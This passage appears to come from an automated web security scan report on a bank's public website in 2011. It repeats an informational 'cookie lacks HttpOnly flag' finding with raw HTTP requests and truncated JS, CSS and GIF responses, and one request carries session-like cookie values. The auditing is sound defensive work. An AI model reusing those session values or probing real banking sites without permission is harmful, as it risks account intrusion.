Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:18 GMT
Content-length: 273
Content-type: application/x-javascript
Last-modified: Fri, 08 Aug 2003 20:58:27 GMT
Etag: "111-3f340ef3"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/

function openWindow(url) {
   popupWin = window.open(url, 'glossary', 'scrollbars,resizable,width=640,height=480')
}
   
function launchWin(url) {
   newwin = open(url, "newwin", "location,menubar,resiza
...[SNIP]...

15.119. http://www.bankofamerica.com/global/js/masthead.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/js/masthead.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/js/masthead.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:36 GMT
Content-length: 2116
Content-type: application/x-javascript
Last-modified: Sun, 08 Feb 2009 12:12:15 GMT
Etag: "844-498ecc1f"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=759609003.20480.0000; path=/

function submit_search(){ document.SiteSearchForm.submit(); }

function bt_rollover(ref, classRef) { eval(ref).className = classRef; }

function create_button(text, href, css_class, onclick_evt, onmou
...[SNIP]...

15.120. http://www.bankofamerica.com/global/js/mvc-js-utils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/js/mvc-js-utils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/js/mvc-js-utils.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:37 GMT
Content-length: 2936
Content-type: application/x-javascript
Last-modified: Tue, 03 May 2005 23:17:45 GMT
Etag: "b78-42780699"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1699133099.20480.0000; path=/

function radio_button_check(bob) {
   var radio_choice = false;
   
   for (counter = 0; counter < document.SigninRedirectForm.SigninGoto.length; counter++) {
       if (document.SigninRedirectForm.SigninGot
...[SNIP]...

15.121. http://www.bankofamerica.com/global/mvc_objects/flyout/BofA_keyboard_navigation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/flyout/BofA_keyboard_navigation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/flyout/BofA_keyboard_navigation.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:51 GMT
Content-length: 683
Content-type: application/x-javascript
Last-modified: Wed, 31 Jul 2002 22:02:25 GMT
Etag: "2ab-3d485e71"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1648801451.20480.0000; path=/

   var current_onfocus_obj = new String("");
   var current_onfocus_obj_classname = new String("");
   
   function rollover(ref, classRef)
   {
   if (classRef.indexOf("-over") != -1)
       {current_onfocus_obj =
...[SNIP]...

15.122. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_BankAmerica.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/flyout/HM_BankAmerica.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/flyout/HM_BankAmerica.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:30 GMT
Content-length: 3015
Content-type: application/x-javascript
Last-modified: Wed, 20 Nov 2002 20:02:19 GMT
Etag: "bc7-3ddbea4b"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=524727979.20480.0000; path=/

/*HM_BankAmerica.js
* by Peter Belesis. v0.2 020303
* Customizations to accompany HM flyout menu script
*/

HM_NS6 = (navigator.vendor == ("Netscape6") || navigator.product == ("Gecko"));
BA_HM_
...[SNIP]...

15.123. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_Loader.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/flyout/HM_Loader.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/flyout/HM_Loader.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:10 GMT
Content-length: 5223
Content-type: application/x-javascript
Last-modified: Sat, 04 Oct 2008 13:06:56 GMT
Etag: "1467-48e76a70"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3158750891.20480.0000; path=/

/*HM_Loader.js
* by Peter Belesis. v4.3 020610
* Copyright (c) 2002 Peter Belesis. All Rights Reserved.

Filename: /HM_Loader.js
Path: /www/bankofamerica/data/global/mvc_objects/flyout/
Descript
...[SNIP]...

15.124. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_ScriptDOM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/flyout/HM_ScriptDOM.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/flyout/HM_ScriptDOM.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:30 GMT
Content-length: 46855
Content-type: application/x-javascript
Last-modified: Mon, 23 Feb 2004 21:21:26 GMT
Etag: "b707-403a6ed6"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=424064683.20480.0000; path=/

/*HM_ScriptDOM.js
* by Peter Belesis. v4.3 020605
* Copyright (c) 2002 Peter Belesis. All Rights Reserved.
* Originally published and documented at http://www.dhtmlab.com/
* Available solely from INT
...[SNIP]...

15.125. http://www.bankofamerica.com/global/mvc_objects/images/1pixel_clear.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/1pixel_clear.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/1pixel_clear.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:55 GMT
Content-length: 43
Content-type: image/gif
Last-modified: Wed, 19 Jun 2002 13:38:20 GMT
Etag: "2b-3d10894c"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=725989035.20480.0000; path=/

GIF89a.............!.......,...........D..;

15.126. http://www.bankofamerica.com/global/mvc_objects/images/mhd_5x1_lines2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/mhd_5x1_lines2.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/mhd_5x1_lines2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:57 GMT
Content-length: 810
Content-type: image/gif
Last-modified: Thu, 30 Oct 2003 22:28:23 GMT
Etag: "32a-3fa19087"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=524727979.20480.0000; path=/

GIF87a..................................................................................................................................................................................................
...[SNIP]...

15.127. http://www.bankofamerica.com/global/mvc_objects/images/mhd_reg_5x1_lines.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/mhd_reg_5x1_lines.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/mhd_reg_5x1_lines.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:19 GMT
Content-length: 44
Content-type: image/gif
Last-modified: Thu, 17 Jul 2003 17:44:52 GMT
Etag: "2c-3f16e094"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1598469803.20480.0000; path=/

GIF89a.............!.......,...............;

15.128. http://www.bankofamerica.com/global/mvc_objects/images/pop_bac_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/images/pop_bac_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/images/pop_bac_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:57 GMT
Content-length: 1119
Content-type: image/gif
Last-modified: Sat, 17 Feb 2007 03:23:01 GMT
Etag: "45f-45d67515"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3863328427.20480.0000; path=/

GIF89a...........R.........@}.`...]............. h....0s......(............@S. 7.`pp..P......Pb....p.......0E........................................................................................
...[SNIP]...

15.129. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/hs2_mvc_content_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_content_style.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:45 GMT
Content-length: 26731
Content-type: text/css
Last-modified: Sun, 13 Feb 2011 13:38:01 GMT
Etag: "686b-4d57deb9"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1011267243.20480.0000; path=/

/* top level font to cascade */
.standard-font {font-size: 71%; font-family : Verdana, Arial, Geneva, Helvetica, sans-serif;}
.standard-font2 {font-size: 100%; font-family : Verdana, Arial, Geneva, He
...[SNIP]...

15.130. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/hs2_mvc_header_footer_style.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:46 GMT
Content-length: 5907
Content-type: text/css
Last-modified: Sat, 12 Sep 2009 13:12:31 GMT
Etag: "1713-4aab9e3f"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=910603947.20480.0000; path=/

.body-top-align {margin-left:0em; margin-top:0em; margin-bottom:-.5em; background-color:#FFFFFF;}

/* global link styles */
.td-global-link { padding-top: 0px; padding-bottom: 0px; padding-left: 0px
...[SNIP]...

15.131. http://www.bankofamerica.com/global/mvc_objects/stylesheet/masthead.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/mvc_objects/stylesheet/masthead.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/mvc_objects/stylesheet/masthead.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:30 GMT
Content-length: 7765
Content-type: text/css
Last-modified: Sat, 12 Dec 2009 10:59:56 GMT
Etag: "1e55-4b2377ac"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1447474859.20480.0000; path=/

BODY {
   PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px
}
.mh-hline {
   BACKGROUND-IMAGE: url(../images/mhd_reg_5x1_lines.gif); BACKGROUND-REPEAT: repeat-x; BA
...[SNIP]...

15.132. http://www.bankofamerica.com/global/stylesheets/01_win_ie.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /global/stylesheets/01_win_ie.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/stylesheets/01_win_ie.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:06 GMT
Content-length: 2955
Content-type: text/css
Last-modified: Sun, 07 Dec 2008 05:02:42 GMT
Etag: "b8b-493b58f2"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=2957424299.20480.0000; path=/

/* Bold headline text */
H1 { font-size: .95em; font-weight: normal; font-family: arial, helvetica, sans-serif; color:#000000; }
H1 strong { font-size: .98.em; font-weight: bold; font-family: arial, h
...[SNIP]...

15.133. http://www.bankofamerica.com/images/px.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /images/px.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/px.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:58 GMT
Content-length: 43
Content-type: image/gif
Last-modified: Tue, 29 Jul 2003 20:35:06 GMT
Etag: "2b-3f26da7a"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3108419243.20480.0000; path=/

GIF89a.............!.......,...........D..;

15.134. http://www.bankofamerica.com/images/shared/dot_clear.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /images/shared/dot_clear.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/shared/dot_clear.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:09 GMT
Content-length: 54
Content-type: image/gif
Last-modified: Thu, 07 Jan 1999 15:00:26 GMT
Etag: "36-3694cc0a"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3041244843.20480.0000; path=/

GIF89a.............!.......,...........2.;t_clear.gif

15.135. http://www.bankofamerica.com/small_business/business_financing/stylesheets/masthead.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /small_business/business_financing/stylesheets/masthead.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small_business/business_financing/stylesheets/masthead.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:07 GMT
Content-length: 2379
Content-type: text/css
Last-modified: Sat, 01 Apr 2006 11:06:44 GMT
Etag: "94b-442e5ec4"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3041244843.20480.0000; path=/

body {margin: 0px; padding: 0px;}
.mh-hline {background-color: #AA051A; background-image: url(/x.gif); background-repeat: repeat-x;}
.mh-vline {background-color: #ffffff; background-image: url(/x.gif)
...[SNIP]...

15.136. http://www.bankofamerica.com/small_business/online_banking_and_services/stylesheets/masthead.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /small_business/online_banking_and_services/stylesheets/masthead.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small_business/online_banking_and_services/stylesheets/masthead.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:26:02 GMT
Content-length: 3493
Content-type: text/css
Last-modified: Sat, 07 Nov 2009 17:40:25 GMT
Etag: "da5-4af5b109"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=3863328427.20480.0000; path=/

body {margin: 0px; padding: 0px;}.mh-hline {background-color: #AA051A; background-image: url(/x.gif); background-repeat: repeat-x;}.mh-vline {background-color: #ffffff; background-image: url(/x.gif);
...[SNIP]...

15.137. http://www.bankofamerica.com/weblinking/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /weblinking/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblinking/main.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:37 GMT
Content-length: 530
Content-type: text/css
Last-modified: Sat, 30 Oct 2010 00:29:51 GMT
Etag: "212-4ccb66ff"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=1749464747.20480.0000; path=/

#content
{
   margin-top: 80px;
   width: 505px;
   margin-left: 10px;
}

#center-image
{
   margin-left:535px;
   margin-top: -100px;
   margin-bottom: -50px;
}

/*WR 29116*/
#center-image1
{
   m
...[SNIP]...

15.138. http://www.bankofamerica.com/weblinking/main_ie.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /weblinking/main_ie.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /weblinking/main_ie.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bankofamerica.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:25:43 GMT
Content-length: 533
Content-type: text/css
Last-modified: Sat, 30 Oct 2010 00:29:51 GMT
Etag: "215-4ccb66ff"
Accept-ranges: bytes
Set-Cookie: BIGipServerngen-www.80=2957424299.20480.0000; path=/

#content{
   margin-top:5px;
}
#center-image
{
   padding-bottom: 35px;
   margin-top: -120px;
}

/*WR 29116*/
#center-image1
{
   padding-bottom: 35px;
   margin-top: -90px;
   margin-bottom: 10px;
...[SNIP]...

15.139. http://www.bankofamerica.com/www/global/js/tc_throttle.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /www/global/js/tc_throttle.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/global/js/tc_throttle.js?timestamp=201132672830458 HTTP/1.1
Host: www.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; CFID=132569126; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; GEOSERVER=2; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CMAVID=none; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:28:26 GMT
